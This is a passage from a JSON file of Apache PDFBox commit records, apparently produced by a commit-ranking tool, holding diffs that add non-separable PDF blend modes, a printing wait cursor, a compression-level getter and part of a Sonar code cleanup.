WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "- * See the License for the specific language governing permissions and", + "- * limitations under the License.", + "- */", + "-package org.apache.pdfbox.pdmodel.graphics.blend;", + "-", + "-import java.awt.AlphaComposite;", + "-import java.awt.Composite;", + "-import java.awt.CompositeContext;", + "-import java.awt.RenderingHints;", + "-import java.awt.color.ColorSpace;", + "-import java.awt.image.ColorModel;", + "-import java.awt.image.Raster;", + "-import java.awt.image.WritableRaster;", + "-import org.apache.commons.logging.Log;", + "-import org.apache.commons.logging.LogFactory;", + "-", + "-/**", + "- * AWT composite for blend modes.", + "- * ", + "- * @author K\u00c3\u00bchn & Weyh Software GmbH", + "- */", + "-public final class BlendComposite implements Composite", + "-{", + "- /**", + "- * Log instance.", + "- */", + "- private static final Log LOG = LogFactory.getLog(BlendComposite.class);", + "-", + "- /**", + "- * Creates a blend composite", + "- *", + "- * @param blendMode Desired blend mode", + "- * @param constantAlpha Constant alpha, must be in the inclusive range", + "- * [0.0...1.0] or it will be clipped.", + "- * @return a blend composite.", + "- */", + "- public static Composite getInstance(BlendMode blendMode, float constantAlpha)", + "- {", + "- if (constantAlpha < 0)", + "- {", + "- LOG.warn(\"using 0 instead of incorrect Alpha \" + constantAlpha);", + "- constantAlpha = 0;", + "- }", + "- else if (constantAlpha > 1)", + "- {", + "- LOG.warn(\"using 1 instead of incorrect Alpha \" + constantAlpha);", + "- constantAlpha = 1;", + "- }", + "- if (blendMode == BlendMode.NORMAL)", + "- {", + "- return AlphaComposite.getInstance(AlphaComposite.SRC_OVER, constantAlpha);", + "- }", + "- else", + "- {", + "- return new BlendComposite(blendMode, constantAlpha);", + "- }", + "- }", + "-", + "- // TODO - non-separable blending modes", + "-", + "- private final BlendMode blendMode;", + "- private final float constantAlpha;", + "-", + "- private BlendComposite(BlendMode blendMode, float constantAlpha)", + "- {", + "- super();", + "- this.blendMode = blendMode;", + "- this.constantAlpha = constantAlpha;", + "- }", + "-", + "- @Override", + "- public CompositeContext createContext(ColorModel srcColorModel, ColorModel dstColorModel,", + "- RenderingHints hints)", + "- {", + "- return new BlendCompositeContext(srcColorModel, dstColorModel, hints);", + "- }", + "-", + "- class BlendCompositeContext implements CompositeContext", + "- {", + "- private final ColorModel srcColorModel;", + "- private final ColorModel dstColorModel;", + "- private final RenderingHints hints;", + "-", + "- BlendCompositeContext(ColorModel srcColorModel, ColorModel dstColorModel,", + "- RenderingHints hints)", + "- {", + "- this.srcColorModel = srcColorModel;", + "- this.dstColorModel = dstColorModel;", + "- this.hints = hints;", + "- }", + "-", + "- @Override", + "- public void dispose()", + "- {", + "- // nothing needed", + "- }", + "-", + "- @Override", + "- public void compose(Raster src, Raster dstIn, WritableRaster dstOut)", + "- {", + "- int x0 = src.getMinX();", + "- int y0 = src.getMinY();", + "- int width = Math.min(Math.min(src.getWidth(), dstIn.getWidth()), dstOut.getWidth());", + "- int height = Math.min(Math.min(src.getHeight(), dstIn.getHeight()), dstOut.getHeight());", + "- int x1 = x0 + width;", + "- int y1 = y0 + height;", + "- int dstInXShift = dstIn.getMinX() - x0;", + "- int dstInYShift = dstIn.getMinY() - y0;", + "- int dstOutXShift = dstOut.getMinX() - x0;", + "- int dstOutYShift = dstOut.getMinY() - y0;", + "-", + "- ColorSpace srcColorSpace = srcColorModel.getColorSpace();", + "- int numSrcColorComponents = srcColorModel.getNumColorComponents();", + "- int numSrcComponents = src.getNumBands();", + "- boolean srcHasAlpha = (numSrcComponents > numSrcColorComponents);", + "- ColorSpace dstColorSpace = dstColorModel.getColorSpace();", + "- int numDstColorComponents = dstColorModel.getNumColorComponents();", + "- int numDstComponents = dstIn.getNumBands();", + "- boolean dstHasAlpha = (numDstComponents > numDstColorComponents);", + "-", + "- int colorSpaceType = dstColorSpace.getType();", + "- boolean subtractive = (colorSpaceType != ColorSpace.TYPE_RGB)", + "- && (colorSpaceType != ColorSpace.TYPE_GRAY);", + "-", + "- boolean blendModeIsSeparable = blendMode instanceof SeparableBlendMode;", + "- SeparableBlendMode separableBlendMode = blendModeIsSeparable ?", + "- (SeparableBlendMode) blendMode : null;", + "-", + "- boolean needsColorConversion = !srcColorSpace.equals(dstColorSpace);", + "-", + "- Object srcPixel = null;", + "- Object dstPixel = null;", + "- float[] srcComponents = new float[numSrcComponents];", + "- // PDFBOX-3501 let getNormalizedComponents allocate to avoid ", + "- // ArrayIndexOutOfBoundsException for bitonal target", + "- float[] dstComponents = null;", + "-", + "- float[] srcColor = new float[numSrcColorComponents];", + "- float[] srcConverted;", + "-", + "- for (int y = y0; y < y1; y++)", + "- {", + "- for (int x = x0; x < x1; x++)", + "- {", + "- srcPixel = src.getDataElements(x, y, srcPixel);", + "- dstPixel = dstIn.getDataElements(dstInXShift + x, dstInYShift + y, dstPixel);", + "-", + "- srcComponents = srcColorModel.getNormalizedComponents(srcPixel, srcComponents,", + "- 0);", + "- dstComponents = dstColorModel.getNormalizedComponents(dstPixel, dstComponents,", + "- 0);", + "-", + "- float srcAlpha = srcHasAlpha ? srcComponents[numSrcColorComponents] : 1.0f;", + "- float dstAlpha = dstHasAlpha ? dstComponents[numDstColorComponents] : 1.0f;", + "-", + "- srcAlpha = srcAlpha * constantAlpha;", + "-", + "- float resultAlpha = dstAlpha + srcAlpha - srcAlpha * dstAlpha;", + "- float srcAlphaRatio = (resultAlpha > 0) ? srcAlpha / resultAlpha : 0;", + "-", + "- // convert color", + "- System.arraycopy(srcComponents, 0, srcColor, 0, numSrcColorComponents);", + "- if (needsColorConversion)", + "- {", + "- // TODO - very very slow - Hash results???", + "- float[] cieXYZ = srcColorSpace.toCIEXYZ(srcColor);", + "- srcConverted = dstColorSpace.fromCIEXYZ(cieXYZ);", + "- }", + "- else", + "- {", + "- srcConverted = srcColor;", + "- }", + "-", + "- if (separableBlendMode != null)", + "- {", + "- for (int k = 0; k < numDstColorComponents; k++)", + "- {", + "- float srcValue = srcConverted[k];", + "- float dstValue = dstComponents[k];", + "-", + "- if (subtractive)", + "- {", + "- srcValue = 1 - srcValue;", + "- dstValue = 1 - dstValue;", + "- }", + "-", + "- float value = separableBlendMode.blendChannel(srcValue, dstValue);", + "- value = srcValue + dstAlpha * (value - srcValue);", + "- value = dstValue + srcAlphaRatio * (value - dstValue);", + "-", + "- if (subtractive)", + "- {", + "- value = 1 - value;", + "- }", + "-", + "- dstComponents[k] = value;", + "- }", + "- }", + "- else", + "- {", + "- // TODO - nonseparable modes", + "- }", + "-", + "- if (dstHasAlpha)", + "- {", + "- dstComponents[numDstColorComponents] = resultAlpha;", + "- }", + "-", + "- dstPixel = dstColorModel.getDataElements(dstComponents, 0, dstPixel);", + "- dstOut.setDataElements(dstOutXShift + x, dstOutYShift + y, dstPixel);", + "- }", + "- }", + "- }", + "- }", + "-}", + "+/*", + "+ * Licensed to the Apache Software Foundation (ASF) under one or more", + "+ * contributor license agreements. See the NOTICE file distributed with", + "+ * this work for additional information regarding copyright ownership.", + "+ * The ASF licenses this file to You under the Apache License, Version 2.0", + "+ * (the \"License\"); you may not use this file except in compliance with", + "+ * the License. You may obtain a copy of the License at", + "+ *", + "+ * http://www.apache.org/licenses/LICENSE-2.0", + "+ *", + "+ * Unless required by applicable law or agreed to in writing, software", + "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", + "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", + "+ * See the License for the specific language governing permissions and", + "+ * limitations under the License.", + "+ */", + "+package org.apache.pdfbox.pdmodel.graphics.blend;", + "+", + "+import java.awt.AlphaComposite;", + "+import java.awt.Composite;", + "+import java.awt.CompositeContext;", + "+import java.awt.RenderingHints;", + "+import java.awt.color.ColorSpace;", + "+import java.awt.image.ColorModel;", + "+import java.awt.image.Raster;", + "+import java.awt.image.WritableRaster;", + "+import org.apache.commons.logging.Log;", + "+import org.apache.commons.logging.LogFactory;", + "+", + "+/**", + "+ * AWT composite for blend modes.", + "+ * ", + "+ * @author K\u00c3\u00bchn & Weyh Software GmbH", + "+ */", + "+public final class BlendComposite implements Composite", + "+{", + "+ /**", + "+ * Log instance.", + "+ */", + "+ private static final Log LOG = LogFactory.getLog(BlendComposite.class);", + "+", + "+ /**", + "+ * Creates a blend composite", + "+ *", + "+ * @param blendMode Desired blend mode", + "+ * @param constantAlpha Constant alpha, must be in the inclusive range", + "+ * [0.0...1.0] or it will be clipped.", + "+ * @return a blend composite.", + "+ */", + "+ public static Composite getInstance(BlendMode blendMode, float constantAlpha)", + "+ {", + "+ if (constantAlpha < 0)", + "+ {", + "+ LOG.warn(\"using 0 instead of incorrect Alpha \" + constantAlpha);", + "+ constantAlpha = 0;", + "+ }", + "+ else if (constantAlpha > 1)", + "+ {", + "+ LOG.warn(\"using 1 instead of incorrect Alpha \" + constantAlpha);", + "+ constantAlpha = 1;", + "+ }", + "+ if (blendMode == BlendMode.NORMAL)", + "+ {", + "+ return AlphaComposite.getInstance(AlphaComposite.SRC_OVER, constantAlpha);", + "+ }", + "+ else", + "+ {", + "+ return new BlendComposite(blendMode, constantAlpha);", + "+ }", + "+ }", + "+", + "+ private final BlendMode blendMode;", + "+ private final float constantAlpha;", + "+", + "+ private BlendComposite(BlendMode blendMode, float constantAlpha)", + "+ {", + "+ super();", + "+ this.blendMode = blendMode;", + "+ this.constantAlpha = constantAlpha;", + "+ }", + "+", + "+ @Override", + "+ public CompositeContext createContext(ColorModel srcColorModel, ColorModel dstColorModel,", + "+ RenderingHints hints)", + "+ {", + "+ return new BlendCompositeContext(srcColorModel, dstColorModel, hints);", + "+ }", + "+", + "+ class BlendCompositeContext implements CompositeContext", + "+ {", + "+ private final ColorModel srcColorModel;", + "+ private final ColorModel dstColorModel;", + "+ private final RenderingHints hints;", + "+", + "+ BlendCompositeContext(ColorModel srcColorModel, ColorModel dstColorModel,", + "+ RenderingHints hints)", + "+ {", + "+ this.srcColorModel = srcColorModel;", + "+ this.dstColorModel = dstColorModel;", + "+ this.hints = hints;", + "+ }", + "+", + "+ @Override", + "+ public void dispose()", + "+ {", + "+ // nothing needed", + "+ }", + "+", + "+ @Override", + "+ public void compose(Raster src, Raster dstIn, WritableRaster dstOut)", + "+ {", + "+ int x0 = src.getMinX();", + "+ int y0 = src.getMinY();", + "+ int width = Math.min(Math.min(src.getWidth(), dstIn.getWidth()), dstOut.getWidth());", + "+ int height = Math.min(Math.min(src.getHeight(), dstIn.getHeight()), dstOut.getHeight());", + "+ int x1 = x0 + width;", + "+ int y1 = y0 + height;", + "+ int dstInXShift = dstIn.getMinX() - x0;", + "+ int dstInYShift = dstIn.getMinY() - y0;", + "+ int dstOutXShift = dstOut.getMinX() - x0;", + "+ int dstOutYShift = dstOut.getMinY() - y0;", + "+", + "+ ColorSpace srcColorSpace = srcColorModel.getColorSpace();", + "+ int numSrcColorComponents = srcColorModel.getNumColorComponents();", + "+ int numSrcComponents = src.getNumBands();", + "+ boolean srcHasAlpha = (numSrcComponents > numSrcColorComponents);", + "+ ColorSpace dstColorSpace = dstColorModel.getColorSpace();", + "+ int numDstColorComponents = dstColorModel.getNumColorComponents();", + "+ int numDstComponents = dstIn.getNumBands();", + "+ boolean dstHasAlpha = (numDstComponents > numDstColorComponents);", + "+", + "+ int srcColorSpaceType = srcColorSpace.getType();", + "+ int dstColorSpaceType = dstColorSpace.getType();", + "+ boolean subtractive = (dstColorSpaceType != ColorSpace.TYPE_RGB)", + "+ && (dstColorSpaceType != ColorSpace.TYPE_GRAY);", + "+", + "+ boolean blendModeIsSeparable = blendMode instanceof SeparableBlendMode;", + "+ SeparableBlendMode separableBlendMode = blendModeIsSeparable ?", + "+ (SeparableBlendMode) blendMode : null;", + "+ NonSeparableBlendMode nonSeparableBlendMode = !blendModeIsSeparable ?", + "+ (NonSeparableBlendMode) blendMode : null;", + "+", + "+ boolean needsColorConversion = !srcColorSpace.equals(dstColorSpace);", + "+", + "+ Object srcPixel = null;", + "+ Object dstPixel = null;", + "+ float[] srcComponents = new float[numSrcComponents];", + "+ // PDFBOX-3501 let getNormalizedComponents allocate to avoid ", + "+ // ArrayIndexOutOfBoundsException for bitonal target", + "+ float[] dstComponents = null;", + "+", + "+ float[] srcColor = new float[numSrcColorComponents];", + "+ float[] srcConverted;", + "+ float[] dstConverted;", + "+ float[] rgbResult = blendModeIsSeparable ? null : new float[dstHasAlpha ? 4 : 3];", + "+", + "+ for (int y = y0; y < y1; y++)", + "+ {", + "+ for (int x = x0; x < x1; x++)", + "+ {", + "+ srcPixel = src.getDataElements(x, y, srcPixel);", + "+ dstPixel = dstIn.getDataElements(dstInXShift + x, dstInYShift + y, dstPixel);", + "+", + "+ srcComponents = srcColorModel.getNormalizedComponents(srcPixel, srcComponents,", + "+ 0);", + "+ dstComponents = dstColorModel.getNormalizedComponents(dstPixel, dstComponents,", + "+ 0);", + "+", + "+ float srcAlpha = srcHasAlpha ? srcComponents[numSrcColorComponents] : 1.0f;", + "+ float dstAlpha = dstHasAlpha ? dstComponents[numDstColorComponents] : 1.0f;", + "+", + "+ srcAlpha = srcAlpha * constantAlpha;", + "+", + "+ float resultAlpha = dstAlpha + srcAlpha - srcAlpha * dstAlpha;", + "+ float srcAlphaRatio = (resultAlpha > 0) ? srcAlpha / resultAlpha : 0;", + "+", + "+ if (separableBlendMode != null)", + "+ {", + "+ // convert color", + "+ System.arraycopy(srcComponents, 0, srcColor, 0, numSrcColorComponents);", + "+ if (needsColorConversion)", + "+ {", + "+ // TODO - very very slow - Hash results???", + "+ float[] cieXYZ = srcColorSpace.toCIEXYZ(srcColor);", + "+ srcConverted = dstColorSpace.fromCIEXYZ(cieXYZ);", + "+ }", + "+ else", + "+ {", + "+ srcConverted = srcColor;", + "+ }", + "+ ", + "+ for (int k = 0; k < numDstColorComponents; k++)", + "+ {", + "+ float srcValue = srcConverted[k];", + "+ float dstValue = dstComponents[k];", + "+", + "+ if (subtractive)", + "+ {", + "+ srcValue = 1 - srcValue;", + "+ dstValue = 1 - dstValue;", + "+ }", + "+", + "+ float value = separableBlendMode.blendChannel(srcValue, dstValue);", + "+ value = srcValue + dstAlpha * (value - srcValue);", + "+ value = dstValue + srcAlphaRatio * (value - dstValue);", + "+", + "+ if (subtractive)", + "+ {", + "+ value = 1 - value;", + "+ }", + "+", + "+ dstComponents[k] = value;", + "+ }", + "+ }", + "+ else", + "+ {", + "+ // Nonseparable blend modes are computed in RGB color space.", + "+ // TODO - CMYK color spaces need special treatment.", + "+", + "+ if (srcColorSpaceType == ColorSpace.TYPE_RGB)", + "+ {", + "+ srcConverted = srcComponents;", + "+ }", + "+ else", + "+ {", + "+ srcConverted = srcColorSpace.toRGB(srcComponents);", + "+ }", + "+", + "+ if (dstColorSpaceType == ColorSpace.TYPE_RGB)", + "+ {", + "+ dstConverted = dstComponents;", + "+ }", + "+ else", + "+ {", + "+ dstConverted = dstColorSpace.toRGB(dstComponents);", + "+ }", + "+ ", + "+ nonSeparableBlendMode.blend(srcConverted, dstConverted, rgbResult);", + "+", + "+ for (int k = 0; k < 3; k++)", + "+ {", + "+ float srcValue = srcConverted[k];", + "+ float dstValue = dstConverted[k];", + "+ float value = rgbResult[k];", + "+ value = Math.max(Math.min(value, 1.0f), 0.0f);", + "+ value = srcValue + dstAlpha * (value - srcValue);", + "+ value = dstValue + srcAlphaRatio * (value - dstValue);", + "+ rgbResult[k] = value;", + "+ }", + "+", + "+ if (dstColorSpaceType == ColorSpace.TYPE_RGB)", + "+ {", + "+ System.arraycopy(rgbResult, 0, dstComponents, 0, dstComponents.length);", + "+ }", + "+ else", + "+ {", + "+ float[] temp = dstColorSpace.fromRGB(rgbResult);", + "+ System.arraycopy(temp, 0, dstComponents, 0,", + "+ Math.min(dstComponents.length, temp.length));", + "+ }", + "+ }", + "+", + "+ if (dstHasAlpha)", + "+ {", + "+ dstComponents[numDstColorComponents] = resultAlpha;", + "+ }", + "+", + "+ dstPixel = dstColorModel.getDataElements(dstComponents, 0, dstPixel);", + "+ dstOut.setDataElements(dstOutXShift + x, dstOutYShift + y, dstPixel);", + "+ }", + "+ }", + "+ }", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "index 00b8dd1d2..cc6624e89 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", + "@@ -204,2 +204,165 @@ public abstract class BlendMode", + "+ public static final NonSeparableBlendMode HUE = new NonSeparableBlendMode()", + "+ {", + "+ @Override", + "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ float[] temp = new float[3];", + "+ getSaturationRGB(dstValues, srcValues, temp);", + "+ getLuminosityRGB(dstValues, temp, result);", + "+ }", + "+ };", + "+", + "+ public static final NonSeparableBlendMode SATURATION = new NonSeparableBlendMode()", + "+ {", + "+ @Override", + "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ getSaturationRGB(srcValues, dstValues, result);", + "+ }", + "+ };", + "+", + "+ public static final NonSeparableBlendMode COLOR = new NonSeparableBlendMode()", + "+ {", + "+ @Override", + "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ getLuminosityRGB(dstValues, srcValues, result);", + "+ }", + "+ };", + "+", + "+ public static final NonSeparableBlendMode LUMINOSITY = new NonSeparableBlendMode()", + "+ {", + "+ @Override", + "+ public void blend(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ getLuminosityRGB(srcValues, dstValues, result);", + "+ }", + "+ };", + "+", + "+ private static int get255Value(float val)", + "+ {", + "+ return (int) Math.floor(val >= 1.0 ? 255 : val * 255.0);", + "+ }", + "+", + "+ private static void getSaturationRGB(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ int minb;", + "+ int maxb;", + "+ int mins;", + "+ int maxs;", + "+ int y;", + "+ int scale;", + "+ int r;", + "+ int g;", + "+ int b;", + "+", + "+ int rd = get255Value(dstValues[0]);", + "+ int gd = get255Value(dstValues[1]);", + "+ int bd = get255Value(dstValues[2]);", + "+ int rs = get255Value(srcValues[0]);", + "+ int gs = get255Value(srcValues[1]);", + "+ int bs = get255Value(srcValues[2]);", + "+", + "+ minb = Math.min(rd, Math.min(gd, bd));", + "+ maxb = Math.max(rd, Math.max(gd, bd));", + "+ if (minb == maxb)", + "+ {", + "+ /* backdrop has zero saturation, avoid divide by 0 */", + "+ result[0] = gd / 255.0f;", + "+ result[1] = gd / 255.0f;", + "+ result[2] = gd / 255.0f;", + "+ return;", + "+ }", + "+", + "+ mins = Math.min(rs, Math.min(gs, bs));", + "+ maxs = Math.max(rs, Math.max(gs, bs));", + "+", + "+ scale = ((maxs - mins) << 16) / (maxb - minb);", + "+ y = (rd * 77 + gd * 151 + bd * 28 + 0x80) >> 8;", + "+ r = y + ((((rd - y) * scale) + 0x8000) >> 16);", + "+ g = y + ((((gd - y) * scale) + 0x8000) >> 16);", + "+ b = y + ((((bd - y) * scale) + 0x8000) >> 16);", + "+", + "+ if (((r | g | b) & 0x100) == 0x100)", + "+ {", + "+ int scalemin;", + "+ int scalemax;", + "+ int min;", + "+ int max;", + "+", + "+ min = Math.min(r, Math.min(g, b));", + "+ max = Math.max(r, Math.max(g, b));", + "+", + "+ if (min < 0)", + "+ {", + "+ scalemin = (y << 16) / (y - min);", + "+ }", + "+ else", + "+ {", + "+ scalemin = 0x10000;", + "+ }", + "+", + "+ if (max > 255)", + "+ {", + "+ scalemax = ((255 - y) << 16) / (max - y);", + "+ }", + "+ else", + "+ {", + "+ scalemax = 0x10000;", + "+ }", + "+", + "+ scale = Math.min(scalemin, scalemax);", + "+ r = y + (((r - y) * scale + 0x8000) >> 16);", + "+ g = y + (((g - y) * scale + 0x8000) >> 16);", + "+ b = y + (((b - y) * scale + 0x8000) >> 16);", + "+ }", + "+ result[0] = r / 255.0f;", + "+ result[1] = g / 255.0f;", + "+ result[2] = b / 255.0f;", + "+ }", + "+", + "+ private static void getLuminosityRGB(float[] srcValues, float[] dstValues, float[] result)", + "+ {", + "+ int delta;", + "+ int scale;", + "+ int r;", + "+ int g;", + "+ int b;", + "+ int y;", + "+ int rd = get255Value(dstValues[0]);", + "+ int gd = get255Value(dstValues[1]);", + "+ int bd = get255Value(dstValues[2]);", + "+ int rs = get255Value(srcValues[0]);", + "+ int gs = get255Value(srcValues[1]);", + "+ int bs = get255Value(srcValues[2]);", + "+ delta = ((rs - rd) * 77 + (gs - gd) * 151 + (bs - bd) * 28 + 0x80) >> 8;", + "+ r = (rd + delta);", + "+ g = (gd + delta);", + "+ b = (bd + delta);", + "+", + "+ if (((r | g | b) & 0x100) == 0x100)", + "+ {", + "+ y = (rs * 77 + gs * 151 + bs * 28 + 0x80) >> 8;", + "+ if (delta > 0)", + "+ {", + "+ int max;", + "+ max = Math.max(r, Math.max(g, b));", + "+ scale = (max == y ? 0 : ((255 - y) << 16) / (max - y));", + "+ }", + "+ else", + "+ {", + "+ int min;", + "+ min = Math.min(r, Math.min(g, b));", + "+ scale = (y == min ? 0 : (y << 16) / (y - min));", + "+ }", + "+ r = y + (((r - y) * scale + 0x8000) >> 16);", + "+ g = y + (((g - y) * scale + 0x8000) >> 16);", + "+ b = y + (((b - y) * scale + 0x8000) >> 16);", + "+ }", + "+ result[0] = r / 255.0f;", + "+ result[1] = g / 255.0f;", + "+ result[2] = b / 255.0f;", + "+ }", + "+", + " // this map *must* come after the declarations above, otherwise its values will be null", + "@@ -223,3 +386,6 @@ public abstract class BlendMode", + " map.put(COSName.EXCLUSION, BlendMode.EXCLUSION);", + "- // TODO - non-separable blending modes", + "+ map.put(COSName.HUE, BlendMode.HUE);", + "+ map.put(COSName.SATURATION, BlendMode.SATURATION);", + "+ map.put(COSName.LUMINOSITY, BlendMode.LUMINOSITY);", + "+ map.put(COSName.COLOR, BlendMode.COLOR);", + " return map;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendComposite.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4095": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "5a2463f8299d8fb93ae7bfd06890c3386ca7462a" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4095", + "relevance": 2 + } + ] + }, + { + "commit_id": "df3d48ee137520ce3827bbfde5c22e02f8a84895", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524072275, + "hunks": 2, + "message": "PDFBOX-2941: show wait cursor when printing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829459 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "index c59fb8880..e7a5656d5 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "@@ -20,2 +20,3 @@ import java.awt.BorderLayout;", + " import java.awt.Component;", + "+import java.awt.Cursor;", + " import java.awt.Dimension;", + "@@ -1130,3 +1131,11 @@ public class PDFDebugger extends JFrame", + " {", + "- job.print(pras);", + "+ setCursor(Cursor.getPredefinedCursor(Cursor.WAIT_CURSOR));", + "+ try", + "+ {", + "+ job.print(pras);", + "+ }", + "+ finally", + "+ {", + "+ setCursor(Cursor.getDefaultCursor());", + "+ }", + " }" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "e2924fb97f723b7ae6f55e255a90badb68cee0fc" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "956ef712ca62c13350db3a74495c1e5cfdd271aa", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530368478, + "hunks": 2, + "message": "PDFBOX-4184: make flate compression level public to allow access in future image compression code, as suggested by Emmeran Seehuber git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834740 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java b/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", + "index 1f63e8454..bb4aec338 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", + "@@ -167,2 +167,18 @@ public abstract class Filter", + "+ /**", + "+ * @return the ZIP compression level configured for PDFBox", + "+ */", + "+ public static int getCompressionLevel()", + "+ {", + "+ int compressionLevel = Deflater.DEFAULT_COMPRESSION;", + "+ try", + "+ {", + "+ compressionLevel = Integer.parseInt(System.getProperty(Filter.SYSPROP_DEFLATELEVEL, \"-1\"));", + "+ }", + "+ catch (NumberFormatException ex)", + "+ {", + "+ LOG.warn(ex.getMessage(), ex);", + "+ }", + "+ return Math.max(-1, Math.min(Deflater.BEST_COMPRESSION, compressionLevel));", + "+ }", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java b/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", + "index 3cc8a65ed..7c43a7dab 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java", + "@@ -120,12 +120,3 @@ final class FlateFilter extends Filter", + " {", + "- int compressionLevel = Deflater.DEFAULT_COMPRESSION;", + "- try", + "- {", + "- compressionLevel = Integer.parseInt(System.getProperty(Filter.SYSPROP_DEFLATELEVEL, \"-1\"));", + "- }", + "- catch (NumberFormatException ex)", + "- {", + "- LOG.warn(ex.getMessage(), ex);", + "- }", + "- compressionLevel = Math.max(-1, Math.min(Deflater.BEST_COMPRESSION, compressionLevel));", + "+ int compressionLevel = getCompressionLevel();", + " Deflater deflater = new Deflater(compressionLevel);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/filter/Filter.java", + "pdfbox/src/main/java/org/apache/pdfbox/filter/FlateFilter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4184": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "7d06d7a609d32e52a0f19d4bc8cbd7438f472d9c" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4184", + "relevance": 2 + } + ] + }, + { + "commit_id": "e74d4b2ce7cbaff9195c79d4332a428b4647f19f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526762576, + "hunks": 29, + "message": "PDFBOX-3353: sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831922 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", + "index a389cee91..6846ca430 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", + "@@ -193,6 +193,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " {", + "- if (style == null)", + "- {", + "- style = PDAnnotationLine.LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE 